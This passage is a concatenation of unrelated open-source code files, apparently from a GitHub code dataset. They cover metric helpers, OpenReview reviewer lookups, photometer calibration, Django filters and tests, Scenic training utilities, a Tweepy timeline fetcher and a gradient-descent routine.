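            for _, g in df.groupby('u') if g['y'].nunique() > 1]
    return float(np.mean(aucs))

# user 2 is all-negative and therefore ignored
assert uauc([0, 1, 1, 0, 0], [0.1, 0.9, 0.8, 0.3, 0.2], [1, 1, 1, 2, 2]) == 1.0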
uauc_list[2], uauc_list[3]),\n index=False\n)\n\n","repo_name":"6115925/BDC2021-WeiXin","sub_path":"LGB/lgb.py","file_name":"lgb.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13757212426","text":"def max_n(l):\n max_num = l[0]\n for i in range(1, len(l)):\n if max_num < l[i]:\n max_num = l[i]\n\n return max_num\n\n\ndef min_n(l):\n min_num = l[0]\n for i in range(1, len(l)):\n if l[i] < min_num:\n min_num = l[i]\n\n return min_num\n\n\ndef min_index(l):\n min_idx = 0\n for i in range(1, len(l)):\n if l[i] < l[min_idx]:\n min_idx = i\n\n return min_idx\n\n\n\ndef max_index(l):\n max_index = 0\n for i in range(1, len(l)):\n if l[max_index] < l[i]:\n max_index = i\n\n return max_index\n\n\ndef input_number():\n n = None\n l = []\n while n != 0:\n n = int(input('Enter a number: '))\n l.append(n)\n l.pop()\n\n return l\n\n\n\n\n\n\nif __name__ == '__main__':\n l = input_number()\n print('List is', l)\n print('Max Number:', max_n(l))\n print('Max Index:', max_index(l))\n print('Min Number:', min_n(l))\n print('Min Index:', min_index(l))\n\n","repo_name":"bizelite/algorithm","sub_path":"everyone/max_number.py","file_name":"max_number.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2791357327","text":"## Import statements\nimport argparse\nimport sys\nimport csv\nimport openreview\nimport re\n\n'''\nRequirements:\n\nopenreview-py\n\nUsage:\n\nUse the --paper (-p) flag to specify the paper number.\nUse the --reviewer (-r) flag to specify a username or email address to get assignments.\n\npython get-reviewers.py --paper 123\n\npython get-reviewers.py --reviewer ~Oriol_Vinyals1\n\n'''\n\nif __name__ == \"__main__\":\n ## Argument handling\n parser = argparse.ArgumentParser()\n parser.add_argument('-p','--paper')\n parser.add_argument('-r','--reviewer')\n parser.add_argument('--baseurl', help=\"base url\")\n parser.add_argument('--username')\n parser.add_argument('--password')\n\n args = parser.parse_args()\n\n client = openreview.Client(baseurl=args.baseurl, username=args.username, password=args.password)\n\n paper_number = args.paper\n reviewer_name = args.reviewer\n\n conference = 'ICLR.cc/2020/Conference'\n\n if paper_number:\n paper_url = 'ICLR.cc/2020/Conference/Paper{}'.format(paper_number)\n reviewer_group = client.get_group(id=paper_url + '/Reviewers')\n anon_reviewers_groups = client.get_groups(regex=paper_url+'/AnonReviewer.*')\n print('Reviewers for paper {paper_number}:'.format(paper_number=paper_number))\n for reviewer in reviewer_group.members:\n anon_reviewers = [g for g in anon_reviewers_groups if reviewer in g.members]\n if anon_reviewers:\n anon_reviewer = anon_reviewers[0]\n print('{reviewer} - (AnonReviewer{number})'.format(reviewer=reviewer, number=anon_reviewer.id[-1]))\n else:\n print('AnonReviewer not found for {reviewer}, something wrong is here'.format(reviewer=reviewer))\n\n if reviewer_name:\n reviewer_groups = client.get_groups(member=reviewer_name, regex='ICLR.cc/2020/Conference/Paper.*/Reviewers$')\n anon_reviewers_groups = client.get_groups(member=reviewer_name, regex='ICLR.cc/2020/Conference/Paper.*/AnonReviewer.*$')\n print('Papers assigned to reviewer {reviewer}:'.format(reviewer=reviewer_name))\n for group in reviewer_groups:\n number = [token for token in group.id.split('/') if token.startswith('Paper')][0].replace('Paper', '')\n anon_reviewers = [g 
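The hand-rolled scans in max_number.py have built-in equivalents — max/min for the values, and max/min over the index range with a key function for the positions (first occurrence wins, matching the original loops):

l = [3, 1, 4, 1, 5]
max_num = max(l)
max_idx = max(range(len(l)), key=l.__getitem__)   # first index of the maximum
min_num = min(l)
min_idx = min(range(len(l)), key=l.__getitem__)   # first index of the minimum
assert (max_num, max_idx, min_num, min_idx) == (5, 4, 1, 1)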
for g in anon_reviewers_groups if g.id.startswith('ICLR.cc/2020/Conference/Paper{number}'.format(number=number))]\n if anon_reviewers:\n anon_reviewer = anon_reviewers[0]\n print('Paper {paper_number} - (AnonReviewer{number})'.format(paper_number=number, number=anon_reviewer.id[-1]))\n else:\n print('AnonReviewer not found for {number}, something wrong is here'.format(number=number))\n\n","repo_name":"openreview/openreview-scripts","sub_path":"venues/ICLR.cc/2020/Conference/python/get-reviewers.py","file_name":"get-reviewers.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"39381751455","text":"def get_average():\n \"\"\"\n Get average of the values after reading the file\n :return:\n \"\"\"\n with open(\"files/Temp\",'r') as file:\n data=file.readlines()\n values=data[1:]\n values=[float(i) for i in values]\n avg=sum(values)/len(values)\n return avg\n\n\naverage=get_average()\nprint(average)\nprint(get_average.__doc__)\n\n","repo_name":"Ajaythota/pythonProject1","sub_path":"getAvg.py","file_name":"getAvg.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24194942196","text":"import os\nimport json\nfrom typing import AnyStr, List\nimport json\nimport logging\n\n#logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(name)s %(levelname)s:%(message)s')\n\nlogger = logging.getLogger(__name__)\n\n#cnfig_file = \"C:\\\\Users\\\\002CSC744\\\\PycharmProjects\\\\JARINE_VA\" \\\n# \"\\\\config\\\\memory\\\\grammar\\\\generic_qs.json\"\n\nlogger.info(\">> Initiate & find content from generic_qs.json file. \")\ncnfig_file = \"..\\\\..\\\\config\\\\memory\\\\grammar\\\\generic_qs.json\"\n\n\ndef get_question_details():\n logger.info(\">> Get question details initiated. \")\n f = open(cnfig_file)\n data = json.load(f)\n # print('Data:\\t', data)\n for i in data:\n # print(\"I:\\t\", i)\n q_no = i[\"q_no\"]\n qus_param = i[\"qus\"]\n ans_param = i[\"ans\"]\n # print(f\"Qus:\\t{qus_param}\\nans:\\t{ans_param}\\nq_no:\\t{q_no}\")\n # print(\"Pling\")\n print(f\"Qus:\\t{qus_param}\\nans:\\t{ans_param}\") # \\nq_no:\\t{q_no}\")\n\n logger.info(\">> Return Question Param & Ans Param. \")\n return qus_param, ans_param\n\n\nclass QuestionFind():\n def __init__(self):\n question_details = get_question_details()\n #pass\n\n\nif __name__ == '__main__':\n inst = QuestionFind\n inst()\n","repo_name":"deb991/JARINE_VA","sub_path":"engine/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30299569015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 19 11:18:16 2022\n\n@author: hagen\n\nHier should be everthing related to the raw netcdf file. 
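getAvg.py's skip-the-header average in a testable form; statistics.mean also avoids the manual sum/len division:

from statistics import mean

def average_after_header(lines):
    # first line is a header (e.g. "Temp"), the rest are numeric values
    return mean(float(x) for x in lines[1:])

assert average_after_header(['Temp', '1.0', '2.0', '3.0']) == 2.0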
In particulare the\ninstances that take the raw and make more out of it\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport sp02.calibration as calib\nimport atmPy.general.measurement_site as atmms\n\nclass SP02RawData(object):\n def __init__(self, dataset, site = None, langley_fit_settings = None):\n assert(False), 'deprecated, this is now in atmPy.radiation.observations.spectral_irradiance'\n self.raw_data = dataset\n if isinstance(site, type(None)):\n assert('site' in dataset.attrs.keys()), 'If site is None, then the dataset has have lat,lon,site, site_name, attributes'\n self.site = atmms.Station(lat= dataset.attrs['site_latitude'], \n lon = dataset.attrs['site_longitude'], \n alt = dataset.attrs['site_elevation'], \n name = dataset.attrs['site_name'], \n abbreviation = dataset.attrs['site'],)\n else:\n self.site = site\n self.langley_fit_settings = langley_fit_settings\n self._sun_position = None\n self._am = None\n self._pm = None\n self._transmission = None\n # self._langleys_am = None\n # self._langleys_pm = None\n # self._langley_fitres_am = None\n # self._langley_fitres_pm = None\n \n @property\n def transmission(self):\n if isinstance(self._transmission, type(None)):\n #### load calibrations\n calibrations = calib.load_calibration_history()\n cal = calibrations[int(self.raw_data.serial_no.values)]\n # use the mean and only the actual channels, other channels are artefacts\n cal = cal.results['mean'].loc[:,self.raw_data.channle_wavelengths.values].sort_index()\n \n #### interpolate and resample calibration (V0s)\n dt = self.raw_data.datetime.to_pandas()\n calib_interp = pd.concat([cal,dt]).drop([0], axis = 1).sort_index().interpolate().reindex(dt.index)\n \n #### correct VOs for earth sun distance see functions above\n calib_interp_secorr = calib_interp.divide(self.sun_position.sun_earth_distance**2, axis = 0)\n \n #### match channels for operation\n channels = self.raw_data.channle_wavelengths.to_pandas()\n raw_data = self.raw_data.raw_data.to_pandas().rename(columns = channels)\n raw_data.columns.name = 'wl'\n \n #### get transmission\n self._transmission = raw_data/calib_interp_secorr\n return self._transmission\n \n @property\n def sun_position(self):\n if isinstance(self._sun_position, type(None)):\n self._sun_position = self.site.get_sun_position(self.raw_data.datetime)\n return self._sun_position\n \n @property\n def am(self):\n if isinstance(self._am, type(None)):\n self._get_langley_from_raw() \n return self._am\n \n @property\n def pm(self):\n if isinstance(self._pm, type(None)):\n self._get_langley_from_raw() \n return self._pm\n \n def tp_get_rdl(self):\n raw_df = self.raw_data.raw_data.to_pandas()\n \n # changing to local time\n raw_df_loc = raw_df.copy()\n index_local = raw_df.index + pd.to_timedelta(self.site.time_zone[1], 'h')\n raw_df_loc.index = index_local\n self.raw_df_loc = raw_df_loc\n \n \n def _get_langley_from_raw(self):\n raw_df = self.raw_data.raw_data.to_pandas()\n \n #### changing to local time\n raw_df_loc = raw_df.copy()\n index_local = raw_df.index + pd.to_timedelta(self.site.time_zone['diff2UTC_of_standard_time'], 'h')\n raw_df_loc.index = index_local\n # self.tp_rdl = raw_df_loc.copy()\n \n ##### getting the one day\n sunpos = self.sun_position.copy()\n start = raw_df_loc.index[0]\n if sunpos.iloc[0].airmass > 0:\n start = pd.to_datetime(f'{start.year}{start.month:02d}{start.day:02d}') + pd.to_timedelta(1,'d')\n end = start + pd.to_timedelta(1, 'd')\n raw_df_loc = raw_df_loc.truncate(start, end)\n\n #### localize and cut day for 
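The core Langley preparation from _get_langley_from_raw() above, isolated with made-up values: voltages are scaled by the squared Sun-Earth distance, then the natural log is taken so that the subsequent fit against airmass is linear:

import numpy as np
import pandas as pd

v = pd.Series([1.00, 0.90, 0.80])     # instrument voltages (hypothetical)
sed = pd.Series([0.99, 1.00, 1.01])   # Sun-Earth distance in AU (hypothetical)
langley = np.log(v * sed ** 2)        # y-axis of a Langley plot
# the x-axis would be the airmass, restricted to roughly 2.2-4.7 as above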
sunposition\n sunpos.index = index_local\n sunpos = sunpos.truncate(start, end)\n\n #### remove the night\n sunpos[sunpos.airmass < 0] = np.nan\n\n #### get the minimum airmass befor I start cutting it out\n noon = sunpos.airmass.idxmin()\n\n #### normalize to the sun_earth_distance\n raw_df_loc = raw_df_loc.multiply(sunpos.sun_earth_distance**2, axis=0)\n \n # langleys are the natural logarith of the voltage over the AMF ... -> log\n # to avoid warnings and strange values do some cleaning before log\n raw_df_loc[raw_df_loc <= 0] = np.nan\n# self.tp_raw_df = raw_df.copy()\n raw_df_loc = np.log(raw_df_loc) \n \n # keep only what is considered relevant airmasses\n amf_min = 2.2 \n amf_max = 4.7\n sunpos[sunpos.airmass < amf_min] = np.nan\n sunpos[sunpos.airmass > amf_max] = np.nan\n\n sunpos_am = sunpos.copy()\n sunpos_pm = sunpos.copy()\n\n sunpos_am[sunpos.index > noon] = np.nan\n sunpos_pm[sunpos.index < noon] = np.nan\n \n\n langley_am = raw_df_loc.copy()\n langley_pm = raw_df_loc.copy()\n\n self.tp_sp_am = sunpos_am\n self.tp_sp_pm = sunpos_pm\n self.tp_df_am = langley_am[~sunpos_am.airmass.isna()].copy()\n self.tp_df_pm = langley_am[~sunpos_pm.airmass.isna()].copy()\n\n langley_am.index = sunpos_am.airmass\n langley_pm.index = sunpos_pm.airmass\n\n self._am = calib.Langley(self,langley_am[~langley_am.index.isna()], langley_fit_settings = self.langley_fit_settings)\n self._pm = calib.Langley(self,langley_pm[~langley_pm.index.isna()], langley_fit_settings = self.langley_fit_settings)\n return True\n \n ","repo_name":"hagne/sp02","sub_path":"sp02/products/raw_nc.py","file_name":"raw_nc.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27993789951","text":"import re\nfrom copy import deepcopy\n\nfrom django.db import models\nfrom django_filters.constants import EMPTY_VALUES\nfrom django_filters.filters import CharFilter, DateFilter\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom django_filters.rest_framework.filterset import FilterSet, FILTER_FOR_DBFIELD_DEFAULTS\n\nfrom core.currency import Currency, CurrencyModelField\nfrom core.models.inouts.pair import Pair, PairModelField\n\n\nclass CurrencyModelFilter(CharFilter):\n field_value_class = Currency\n\n def filter(self, qs, value):\n if value is None:\n return self.get_method(qs)(**{self.field_name: None})\n\n if value in EMPTY_VALUES:\n return qs\n\n if self.field_value_class.exists(value):\n value = self.field_value_class.get(value).id\n else:\n return qs.none()\n\n if self.distinct:\n qs = qs.distinct()\n qs = self.get_method(qs)(**{self.field_name: value})\n return qs\n\n\nclass PairModelFilter(CurrencyModelFilter):\n field_value_class = Pair\n\n\nFILTER_FOR_DBFIELD_DEFAULTS = deepcopy(FILTER_FOR_DBFIELD_DEFAULTS)\nFILTER_FOR_DBFIELD_DEFAULTS.update({\n CurrencyModelField: {'filter_class': CurrencyModelFilter},\n PairModelField: {'filter_class': PairModelFilter},\n models.DateTimeField: {'filter_class': DateFilter},\n models.DateField: {'filter_class': DateFilter},\n})\n\n\ndef reparse_query_data(query_data):\n res = {}\n for param, value in query_data.items():\n if '[' and ']' in param:\n new_param_name = param.split('[')[0]\n regex = re.compile('%s\\[([\\w\\d_]+)\\]' % new_param_name)\n match = regex.match(param)\n inner_key = match.group(1)\n if inner_key == 'start':\n res[new_param_name+'__gte'] = value\n elif inner_key == 'end':\n res[new_param_name + '__lte'] = value\n else:\n res[param] = value\n return 
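The bracketed-parameter rewrite performed by reparse_query_data() above, sketched without the regex machinery (str.partition does the same split for well-formed keys):

def range_key(param, value):
    name, _, inner = param.partition('[')
    inner = inner.rstrip(']')
    suffix = {'start': '__gte', 'end': '__lte'}.get(inner)
    return (name + suffix, value) if suffix else (param, value)

assert range_key('created[start]', '2021-01-01') == ('created__gte', '2021-01-01')
assert range_key('plain', 1) == ('plain', 1)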
res\n\n\nclass GenericFilterset(FilterSet):\n FILTER_DEFAULTS = FILTER_FOR_DBFIELD_DEFAULTS\n\n def __init__(self, *args, **kwargs):\n super(GenericFilterset, self).__init__(*args, **kwargs)\n self.data = reparse_query_data(self.data)\n \n def filter_queryset(self, queryset):\n # dirty hack\n data = dict(self.data)\n for name, value in self.form.cleaned_data.items():\n if name in data and name == 'id':\n value = data[name]\n if isinstance(value, list) and len(value) > 1:\n lookup = f'{name}__in'\n queryset = queryset.filter(**{lookup: value})\n else:\n if isinstance(value, list):\n value = value[0]\n queryset = self.filters[name].filter(queryset, value)\n\n else:\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n\nclass GenericAllFieldsFilter(DjangoFilterBackend):\n filterset_base = GenericFilterset\n\n def get_filterset_class(self, view, queryset=None):\n \"\"\"\n Return the `FilterSet` class used to filter the queryset.\n \"\"\"\n defined_filterset_fields = getattr(view, 'filterset_fields', None)\n filterset_fields = {}\n model_fields = {f.name: f for f in queryset.model._meta.fields}\n for field_name in defined_filterset_fields:\n if field_name in model_fields and type(model_fields[field_name]) in [models.DateField, models.DateTimeField]:\n lookups = ['gte', 'lte',]\n else:\n lookups = ['exact']\n filterset_fields[field_name] = lookups\n\n if defined_filterset_fields and queryset is not None:\n MetaBase = getattr(self.filterset_base, 'Meta', object)\n\n class AutoFilterSet(self.filterset_base):\n class Meta(MetaBase):\n model = queryset.model\n fields = filterset_fields\n\n return AutoFilterSet\n\n return None","repo_name":"Polygant/OpenCEX-backend","sub_path":"admin_rest/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24789741711","text":"\"\"\"Utils for training.\"\"\"\n\nfrom typing import Any, Dict, Optional, Tuple\n\nfrom flax.core import frozen_dict\nimport ml_collections\nfrom scenic.train_lib_deprecated.train_utils import TrainState\n\n\ndef get_average_batch_size(config: ml_collections.ConfigDict):\n \"\"\"Computes average batch size.\"\"\"\n\n if config.get('batch_size') is not None:\n return config.batch_size\n\n batch_sizes_sum = 0\n n_datasets = 0\n\n for bs in config.batch_sizes.values():\n batch_sizes_sum += bs\n n_datasets += 1\n\n average_batch_size = int(batch_sizes_sum // n_datasets)\n\n return average_batch_size\n\n\ndef get_num_training_steps_multi(\n config: ml_collections.ConfigDict,\n datasets_metadata: Dict[str, Dict[str, Any]]) -> Tuple[int, Optional[int]]:\n \"\"\"Calculates the total number of training step and possibly steps_per_epoch.\n\n The main training loop is based on number of training steps. Thus, for\n datasets\n that we want to train based on number of epochs, we need to calculate the\n total number of training steps. This function looks for `num_training_steps`\n in config, if it exists it returns that as the total step and `None` as\n `steps_per_epoch`. If num_training_steps doesn't exist, then it looks for\n `num_training_epochs` and given the size of training data calculates the total\n steps and steps_per_epoch. 
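The step-count arithmetic that get_num_training_steps_multi documents, with drop_remainder=True assumed (so a partial final batch is discarded by the floor division):

num_train_examples = 50_000
batch_size = 128
steps_per_epoch = num_train_examples // batch_size  # floor division: 390
total_steps = steps_per_epoch * 10                  # e.g. 10 training epochs
assert (steps_per_epoch, total_steps) == (390, 3900)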
In this computation, we assume that\n drop_remainder=True.\n\n Args:\n config: Configuration of the experiment.\n datasets_metadata: Meta-data that is generated by the dataset_builder.\n\n Returns:\n total_steps: Total number of training steps.\n steps_per_epoch: Number of steps in every epoch.\n \"\"\"\n num_total_train_examples = 0\n for ds_metadata in datasets_metadata.values():\n num_total_train_examples += ds_metadata.get('num_train_examples', 0)\n\n # We either use num_training_epochs or num_training_steps.\n steps_per_epoch = num_total_train_examples // get_average_batch_size(config)\n\n if config.get('num_training_steps'):\n assert not config.get('num_training_epochs')\n return config.num_training_steps, steps_per_epoch or None\n else:\n assert config.num_training_epochs and not config.get('num_training_steps')\n return (steps_per_epoch * config.num_training_epochs), steps_per_epoch\n\n\ndef pop_axes_names(\n train_state: TrainState,\n axes_name: str = 'param_axes') -> Tuple[TrainState, Optional[Any]]:\n \"\"\"Removes axes_names from model_state for a train state.\n\n Args:\n train_state: Training state.\n axes_name: the string specifying the name in the model_state\n\n Returns:\n New train state without axes_names in model_state, axes_names metadata if it\n was removed (so it can be re-added).\n \"\"\"\n model_state = train_state.model_state\n if axes_name in train_state.model_state:\n model_state, param_axes = frozen_dict.freeze(model_state).pop(axes_name)\n return train_state.replace(model_state=model_state), param_axes\n else:\n return train_state, None\n\n\ndef re_add_axis_names(train_state: TrainState,\n param_axes: Any,\n axes_name: str = 'param_axes') -> TrainState:\n \"\"\"Adds axes_names to model_state for a train state.\n\n Args:\n train_state: Training state.\n param_axes: Model axes metadata to re-add.\n axes_name: the string specifying the name in the model_state\n\n Returns:\n New train state without axes_names in model_state, axes_names metadata if it\n was removed (so it can be re-added).\n \"\"\"\n if param_axes:\n model_state = frozen_dict.unfreeze(train_state.model_state)\n model_state[axes_name] = param_axes\n return train_state.replace(model_state=frozen_dict.freeze(model_state))\n else:\n return train_state\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/vid2seq/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} +{"seq_id":"9796803442","text":"import datetime\nimport tweepy\n\nauth = tweepy.OAuthHandler(\"consumer_key\", \"consumer_secret\")\nauth.set_access_token(\"access_token\", \"access_token_secret\")\n\napi = tweepy.API(auth)\nusername = 'TimesNow'\nstartDate = datetime.datetime(2020, 6, 24, 2, 0, 0)\nendDate = datetime.datetime(2020, 6, 24, 2, 30, 0)\ntweets = []\ntmpTweets = api.user_timeline(username)\n\nwhile (tmpTweets[-1].created_at > startDate):\n print(\"Last Tweet @\", tmpTweets[-1].created_at, \" - fetching some more\")\n tmpTweets = api.user_timeline(username, max_id = tmpTweets[-1].id)\n for tweet in tmpTweets:\n if tweet.created_at < endDate and tweet.created_at > startDate:\n tweets.append(tweet)\n\nprint(\"\\nTweets of: {} \".format(username).upper())\nprint(\"\\n\")\n\n\ncount = 0\nfor user in tweets[:3]:\n count = count + 1\n print(\"Tweet {} \".format(count))\n print(\"ID: {}\".format(user.id))\n print(\"Date Time: {}\".format(user.created_at))\n print(user.text)\n 
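The max_id pagination pattern from the Twitter script above, isolated into a function (requires valid credentials to run; one tweak over the original: passing max_id=last_id - 1 avoids re-fetching the boundary tweet that the original loop reads twice):

def fetch_between(api, username, start, end):
    tweets = []
    page = api.user_timeline(username)
    while page and page[-1].created_at > start:
        tweets += [t for t in page if start < t.created_at < end]
        # page backwards: everything strictly older than the last tweet seen
        page = api.user_timeline(username, max_id=page[-1].id - 1)
    return tweets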
print(\"\\n\")\n\n\n\n","repo_name":"Sayali1993/Central_Repository","sub_path":"Twitter_Assignment6.py","file_name":"Twitter_Assignment6.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31895554090","text":"\"\"\"\r\nLet the parallelogram $ABCD.$ Let $CE\\perp BC,\\ AE \\perp AB.$ Shown that\r\n$ED \\perp AC.$\r\n\"\"\"\r\n\r\n\r\nimport sympy as smp\r\nfrom geom2D import *\r\nxA,yA,xB,yB,xC,yC=smp.symbols('xA,yA,xB,yB,xC,yC',real=True)\r\n\r\n# ----------------------------------------------------------------------------\r\nA=smp.Point(xA,yA)\r\nB=smp.Point(xB,yB)\r\nC=smp.Point(xC,yC)\r\nl1=smp.Line(A,B)\r\nl2=smp.Line(B,C)\r\nl3=parallelLine(C,l1)\r\nl4=parallelLine(A,l2)\r\nD0=smp.intersection(l3,l4);D=D0[0]\r\nE0=smp.intersection(l2.perpendicular_line(C),l1.perpendicular_line(A));E=E0[0]\r\n# ----------------------------------------------------------------------------\r\nrez=smp.Line(A,C).is_perpendicular(smp.Line(D,E))\r\nprint('The lines are perpendicular : '+str(rez))\r\n\r\nimport objPltLibrary as opl\r\nimport matplotlib.pyplot as plt\r\n\r\nxA=0;yA=0\r\nxB=4;yB=0\r\nxC=5;yC=2\r\n# ----------------------------------------------------------------------------\r\nA=smp.Point(xA,yA)\r\nB=smp.Point(xB,yB)\r\nC=smp.Point(xC,yC)\r\nl1=smp.Line(A,B)\r\nl2=smp.Line(B,C)\r\nl3=parallelLine(C,l1)\r\nl4=parallelLine(A,l2)\r\nD0=smp.intersection(l3,l4);D=D0[0]\r\nE0=smp.intersection(l2.perpendicular_line(C),l1.perpendicular_line(A));E=E0[0]\r\n# ----------------------------------------------------------------------------\r\n\r\nobj = opl.plotObj(\r\n fig_height=10,\r\n fig_width=10,\r\n xMin=-2,\r\n xMax=8,\r\n yMin=-2,\r\n yMax=8,\r\n title='Prob10p9'\r\n)\r\n\r\nobj.pltPoint(xA,yA,label='A')\r\nobj.pltPoint(xB,yB,label='B')\r\nobj.pltPoint(xC,yC,label='C')\r\nxD=D.x;yD=D.y\r\nxE=E.x;yE=E.y\r\nobj.pltPoint(xD,yD,label='D')\r\nobj.pltPoint(xE,yE,label='E')\r\nx=[xA,xB,xC,xD,xA]\r\ny=[yA,yB,yC,yD,yA]\r\nlabel=['','','','']\r\nobj.pltPolygonalLine(x,y,label)\r\n\r\nobj.pltLine(xD,yD,xE,yE,label='p',color='blue')\r\nobj.pltSegment(xA,yA,xC,yC,label='q',color='red')\r\n\r\nplt.show()\r\n","repo_name":"e-scheiber/sympy_geometry","sub_path":"Problems/prob10p9.py","file_name":"prob10p9.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5174476905","text":"'''General implementation of gradient descent algorithm.\n\nMore of a learning exercise for myself.\n'''\n\nimport warnings\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.optimize import line_search\nfrom scipy.optimize.linesearch import LineSearchWarning\n\ndef gd(f, grad, x0, alpha=None, maxiter=1e6, tol=1e-8):\n '''Gradient descent algorithm.\n\n Parameters\n ==========\n f : callable\n Function to be optimized.\n grad : callable\n Function that computes the gradient of f.\n x0 : array_like\n Initial point to start to start descent.\n alpha : callable or float, optional\n Either a fixed step size or a function that returns step size.\n maxiter : int, optional\n Do not exceed this number of iterations.\n tol : float, optional\n Run until change in norm of gradient is within this number.\n\n Returns\n =======\n cur_x : array_like\n Estimate of optimal choice of x.\n int\n Number of iterations.\n '''\n\n if not isinstance(x0, np.ndarray):\n x0 = np.atleast_1d(x0).astype(float)\n\n # Use scipy.optimize.line_search by default\n if 
alpha is None:\n alpha = line_search\n elif not callable(alpha):\n # If stepsize is constant, package it in a constant function\n alpha0 = alpha\n def alpha(*args, **kwargs): # pylint: disable=E0102,W0613\n return(alpha0, 0, 0, None, None, None)\n\n # Set up everything we need for the loop\n cur_x = x0.copy()\n previous_step_size = np.inf\n alpha0_default = 0.5\n alpha0_backup = alpha0_default\n f_vals = [None, None]\n\n # Do the thing!\n pbar = tqdm(total=100, desc='GD %s' % f.__name__, leave=False)\n for ii in range(int(maxiter)):\n\n prev_x = cur_x.copy()\n\n # Compute the search direction\n g0 = grad(f, prev_x)\n s0 = -g0\n\n # Get step size\n # Sometimes line_search doesn't converge - silently ignore this\n with warnings.catch_warnings():\n warnings.filterwarnings('error', category=LineSearchWarning)\n try:\n alpha0, _fc, _gc, f_vals[0], f_vals[1], _derphi_star = alpha(\n f, lambda x: grad(f, x), prev_x, s0, g0,\n f_vals[0], f_vals[1])\n # print('Working!')\n alpha0_backup = alpha0_default\n except LineSearchWarning:\n tqdm.write('Broke')\n alpha0 = alpha0_backup\n alpha0_backup /= 2\n\n # Take care of objective cycling\n f_vals[1] = f_vals[0]\n f_vals[0] = None\n\n # Take the step\n cur_x += alpha0*s0\n\n # Figure out if we can end\n # previous_step_size = np.abs(cur_x - prev_x)\n previous_step_size = np.linalg.norm(grad(f, cur_x))\n pbar.n = 0\n val = np.clip(np.round(\n 100*tol/np.max(previous_step_size + np.finfo(float).eps)), 0, 100)\n pbar.update(val)\n\n if np.all(previous_step_size < tol):\n break\n\n if np.any(previous_step_size > tol):\n warnings.warn('GD hit maxiters! Change in step size is not < %g' % tol)\n\n # return the solution\n return(cur_x, ii+1)\n\nif __name__ == '__main__':\n pass\n","repo_name":"mckib2/mr_utils","sub_path":"mr_utils/optimization/gd.py","file_name":"gd.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"16458494286","text":"from django.test import TestCase\nfrom analysis.enum import TaskStatus\nfrom analysis.models import NetworkAnalysisReports, TaskReports\nfrom analysis.analysis_models.static_analysis import StaticAnalysisReports\nfrom analysis.analysis_models.dynamic_analysis import DynamicAnalysisReports\n\nfrom django.db.utils import IntegrityError\n\n\nclass TaskReportsTestCase(TestCase):\n databases = {\"elfen\"}\n\n @classmethod\n def setUpTestData(cls):\n cls.static_analysis_reports = StaticAnalysisReports.objects.create()\n cls.dynamic_analysis_reports = DynamicAnalysisReports.objects.create()\n cls.network_analysis_reports = NetworkAnalysisReports.objects.create()\n TaskReports.objects.create(\n static_reports=cls.static_analysis_reports,\n dynamic_reports=cls.dynamic_analysis_reports,\n network_reports=cls.network_analysis_reports\n )\n\n def test_taskreports_get(self):\n \"\"\"\n This test checks if TaskReports object can be retrieved. There should\n be only 1.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n def test_taskreports_update(self):\n \"\"\"\n This test updates an existing TaskReports object. 
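The gd() routine above reduced to its core: a constant-step descent on f(x) = x² (analytic gradient 2x), stopping on the gradient-norm tolerance exactly as the full version does:

import numpy as np

x, alpha, tol = np.array([5.0]), 0.1, 1e-8
for _ in range(10_000):
    g = 2 * x                      # gradient of x**2
    if np.linalg.norm(g) < tol:
        break
    x = x - alpha * g
assert abs(x[0]) < 1e-6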
It changes the status.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n taskreport = objs[0]\n taskreport.status = TaskStatus.COMPLETE\n taskreport.save()\n\n obj = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )[0]\n self.assertEqual(obj.status, TaskStatus.COMPLETE)\n\n def test_taskreports_delete(self):\n \"\"\"\n This test checks if an existing TaskReports object can be deleted.\n It should be, since *currently* there are no other db objects\n referencing this TaskReports object.\n \"\"\"\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 1)\n\n taskreport = objs[0]\n taskreport.delete()\n\n objs = TaskReports.objects.filter(\n static_reports=self.static_analysis_reports\n )\n self.assertEqual(len(objs), 0)\n\n def test_taskreports_foreignkey_staticreports_cannot_delete(self):\n \"\"\"\n This test checks if the StaticAnalysisReports object referenced by the\n TaskReports object can be deleted. It should not be, since there is a\n foreign key constraint with on_delete=models.PROTECT.\n \"\"\"\n try:\n 